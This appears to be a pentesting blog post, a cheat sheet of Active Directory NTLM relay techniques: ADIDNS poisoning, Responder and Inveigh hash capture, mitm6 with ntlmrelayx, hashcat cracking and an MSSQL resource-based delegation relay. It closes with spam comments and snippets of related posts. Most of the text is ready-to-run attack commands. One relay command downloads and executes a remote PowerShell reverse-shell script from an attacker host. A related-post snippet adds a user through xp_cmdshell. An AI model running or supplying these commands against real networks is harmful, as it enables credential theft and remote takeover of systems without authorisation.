Skip to main content

Relay Attacks


HashHashcatAttack method
LM3000crack/pass the hash
NTLM/NTHash1000crack/pass the hash
NTLMv1/Net-NTLMv15500crack/relay attack
NTLMv2/Net-NTLMv25600crack/relay attack
Abusing ADIDNS to Send traffic to the target 

#Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes
Import-Module ./
Powermad.ps1
PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose

#assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose

Capturing Hashes using responder and cracking hashes 
#Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder
sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat
hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule --force
Mitm6 & NTLMRelayx

#start MITM6 and assign IPV6 DNS Address to hosts
mitm6 -d victim.domain

#start ntmrelay
ntlmrelayx.py -wh Attacker_IP -t smb://VICTIM_IP/ -i 
NTLM relay of ADWS (WCF) connections

This attack works only when a connection is initiated from the target machine. 

#Start 
ntlmrelayx.py --no-smb-server --no-http-server -t rpc://TARGET_IP-c "echo a > c:\test"

#Simulate the vuln
get-aduser -filter * -server <pentester_machine>

#Capture and view the traffic in wireshark
socat TCP-LISTEN:9389,fork,reuseaddr TCP:DC_IP:9389

Relaying using ntlmrelayx
# -wh: Server hosting WPAD file (Attacker’s IP)
# -t: Target (You cannot relay credentials to the same device that you’re spoofing)
# -i: open an interactive shell
# -l: store the collected info in a specified directory
# -c: execute the command
# -e: execute a binary

ntlmrelayx can automatically dump hashes, when it can access an administrator account.
so, lookout for the hashes in the output. Also Impacket 0.9.23-dev version has issues with ntlmrelay. better use the stable version.

sudo proxychains ntlmrelayx.py -t smb://192.168.1.2 -smb2support

Useful commands

sudo proxychains ntlmrelayx.py -t smb://192.168.1.2 -smb2support

sudo proxychains ntlmrelayx.py -t smb://10.10.10.10 -l loot -i -smb2support -c "powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.10.102:8000/powerrev.ps1')"

#Target a specific user on a specific target
sudo proxychains ntlmrelayx.py -t smb://USERNAME@192.168.2.1 -smb2support 
Inveigh 
Inveigh does not support SMB-auth, so prefer ntlmrelayx


Import-Module .\Inveigh.ps1

#Start ADIDNS abuse
Invoke-Inveigh -ConsoleOutput Y -adidns combo

#Use credentials for ADIDNS Abuse using Inveigh
$SecPassword = ConvertTo-SecureString 'P#SSW)RD!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('steins.LOCAL\USERNAME', $SecPassword)

Invoke-Inveigh -ConsoleOutput Y -adidns combo -ADIDNSCredential $Cred -ADIDNSDomain 192.168.2.10

Invoke-Inveigh -ConsoleOutput Y -adidns combo -ADIDNSDomain steins.local -ADIDNSDomainController 192.168.2.10


#Capturing Hashes on the target
Invoke-Inveigh -ConsoleOutput Y -DNS Y

#cracking the hashes captured from inveigh
hashcat -m 5600 hash ~/Downloads/Tools/rockyou.txt --force -r /usr/share/hashcat/rules/d3ad0ne.rule


#if you are unable to crack a hash, use inveigh-relay to relay the hashes
invoke-inveighrelay -ConsoleOutput Y -Target 192.168.21.155 -ShowHelp N -StatusOutput N -Command "powershell.exe -c whoami"
Resource based Constraint Delegation Attack on MSSQL Server

More Info Here

#add a DNS entry to attacker machine
Invoke-DNSUpdate -DNSType A -DNSName shit -DNSData 10.10.10.10

#run the command on sql server which has xp_dirtree stored procedure
SQLCMD -S SERVER\username -Q "exec master.dbo.xp_dirtree '\\shit\a'" -U Admin -P password

proxychains python rbcd_relay.py SQLServer_IP steins.local server$ Other_User

 

Comments

  1. I am very impressed with your post because this post is very beneficial for me and provide a new knowledge to me
    Movement Output Crack

    ReplyDelete
  2. My response on my own website. Appreciation is a wonderful thing...thanks for sharing keep it up. Output Movement Crack

    ReplyDelete
  3. Any content inclusive to all is the best content. With Acadecraft’s digital accessibility solutions, clients can get the best accessibility services. From accessibility audits to accessibility remediation services, we provide all. Our accessibility experts ensure to check everything minutely. From the alt-texts to the color contrast, the experts take care of all!
    Also Read: mobile learning companies

    ReplyDelete

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds

Windows Priv Escallation

1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm

Forensics & Crypto

Online Decoder --> https://2cyr.com/decode/ Encoding errors -->  https://ftfy.now.sh/ File Signatures List -->  Click here PCAP Analysis: -->  https://www.packettotal.com/ Online Cipher Decryptors: CyberChef  - Cipher Decoder   Crack Station-Hash Cracke r Decrypt Any Kind of Hash 1)  Cipher Statistics 2)  Index of Coincidence Calculator - Online IC Cryptanalysis Tool 3)  Tools List (Awesome and Fantastic Tools) Available on dCode 4)  Solve an Aristocrat or Patristocrat 5)  RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data 5-1)  RSA - Find PQ using N 6)  BertNase's Own Hide content in a Image made of blocks - npiet fun! 7)  Vigenere Solver - www.guballa.de 8)  Fernet (Decode) 9)  Unicode Text Steganography Encoders/Decoders 10)  All in ONE encoders and Decoders Tool 11) Cryptii - Decoder Image Forensics: 1)  Forensically, free online photo forensics tools - 29a.ch 2)  StegSolve to decryt data in